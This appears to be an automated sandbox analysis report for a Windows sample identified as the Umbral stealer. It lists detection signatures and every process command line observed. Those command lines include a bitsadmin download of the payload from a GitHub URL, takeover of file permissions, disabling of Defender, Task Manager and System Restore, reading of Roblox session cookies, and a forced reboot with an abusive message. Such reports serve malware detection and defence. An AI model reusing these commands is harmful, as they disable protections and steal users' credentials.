Analysis Overview
SHA256
cc13206ad514d61c7ea83f9380a571b93e23faafa829b04e877fcd38b4e83b75
Threat Level: Known bad
The file test.exe was found to be: Known bad.
Malicious Activity Summary
Umbral
Detect Umbral payload
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
Download via BitsAdmin
Possible privilege escalation attempt
Command and Scripting Interpreter: PowerShell
Drops file in Drivers directory
Downloads MZ/PE file
Checks computer location settings
Modifies file permissions
Executes dropped EXE
Drops startup file
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Sets desktop wallpaper using registry
Drops file in Program Files directory
System Network Configuration Discovery: Internet Connection Discovery
System Location Discovery: System Language Discovery
Enumerates physical storage devices
Unsigned PE
Suspicious behavior: EnumeratesProcesses
Runs ping.exe
Detects videocard installed
Views/modifies file attributes
Modifies registry class
Suspicious use of WriteProcessMemory
Script User-Agent
Delays execution with timeout.exe
Kills process with taskkill
Suspicious use of AdjustPrivilegeToken
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-09 10:50
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-09 10:50
Reported
2024-08-09 10:53
Platform
win10v2004-20240802-en
Max time kernel
105s
Max time network
115s
Command Line
Signatures
Detect Umbral payload
Umbral
Credentials from Password Stores: Credentials from Web Browsers
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Download via BitsAdmin
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bitsadmin.exe | N/A |
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
Possible privilege escalation attempt
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\test.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mssec.bat | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\melter.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\takeown.exe | N/A |
| N/A | N/A | C:\Windows\system32\icacls.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\A: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\L: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\I: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Q: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\R: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\V: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\J: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\T: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\G: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\O: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\D: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\H: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Y: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\K: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\M: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\N: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\S: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\B: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\E: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\Z: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\U: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\X: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\W: | C:\Windows\System32\WScript.exe | N/A |
| File opened (read-only) | \??\P: | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1478471702-risitas.jpg" | C:\Windows\system32\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000\Control Panel\Desktop\wallpaper | C:\Windows\system32\reg.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Java\jdk-1.8\jre\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
| File opened for modification | C:\Program Files\Java\jre-1.8\bin\server\classes.jsa | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\melter.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\timeout.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-786284298-625481688-3210388970-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\system32\takeown.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Umbral.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Views/modifies file attributes
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\attrib.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\test.exe
"C:\Users\Admin\AppData\Local\Temp\test.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\92BA.tmp\92BB.tmp\92BC.bat C:\Users\Admin\AppData\Local\Temp\test.exe"
C:\Windows\system32\bitsadmin.exe
bitsadmin /transfer downloadjob /download /priority normal https://github.com/chokapik1234patcheur/sdfsdifuhsdifhsdiufhsdihfis/raw/main/Umbral.exe C:\Users\Admin\AppData\Local\Temp\Umbral.exe
C:\Users\Admin\AppData\Local\Temp\Umbral.exe
"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\system32\takeown.exe
takeown /f C:\*.*
C:\Windows\system32\icacls.exe
Icacls C:\*.* /C /G Admin:F
C:\Windows\system32\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v DisableTaskMgr /t REG_DWORD /d 1 /f
C:\Windows\system32\reg.exe
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d 1 /f
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\32417.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\21237.vbs"
C:\Windows\system32\timeout.exe
timeout 60
C:\Windows\SYSTEM32\attrib.exe
"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" os get Caption
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" computersystem get totalphysicalmemory
C:\Windows\System32\Wbem\wmic.exe
"wmic.exe" csproduct get uuid
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
C:\Windows\System32\Wbem\wmic.exe
"wmic" path win32_VideoController get name
C:\Windows\SYSTEM32\cmd.exe
"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause
C:\Windows\system32\PING.EXE
ping localhost
C:\Windows\system32\rundll32.exe
rundll32 user32.dll, SwapMouseButton
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\14070.vbs"
C:\Windows\system32\timeout.exe
timeout 14
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x3d0 0x478
C:\Windows\system32\taskkill.exe
taskkill /F /IM hl2.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM javaw.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM RobloxPlayerBeta.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM FortniteClient-Win64-Shipping.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM GenshinImpact.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM Among Us.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM chrome.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM firefox.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM msedge.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM iexplore.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM explorer.exe
C:\Windows\system32\shutdown.exe
shutdown -r -t 60 -c "Dans 1 minutes tu n'as plus de PC fils de viol, On t'a bien baiser le cul fils de pute :)"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\30130.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\23646.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\8377.vbs"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\risitas.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\1942.vbs" 12449.bat
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\12449.bat" "
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Users\Admin\AppData\Local\Temp\melter.exe
melter.exe
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v WallpaperStyle /t REG_SZ /d 2 /f
C:\Windows\system32\rundll32.exe
RUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\3587.vbs"
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "" /f
C:\Windows\system32\reg.exe
reg add "HKCU\control panel\desktop" /v wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\1478471702-risitas.jpg" /f
C:\Windows\system32\reg.exe
reg delete "HKCU\Software\Microsoft\Internet Explorer\Desktop\General" /v WallpaperStyle /f
C:\Windows\system32\reg.exe
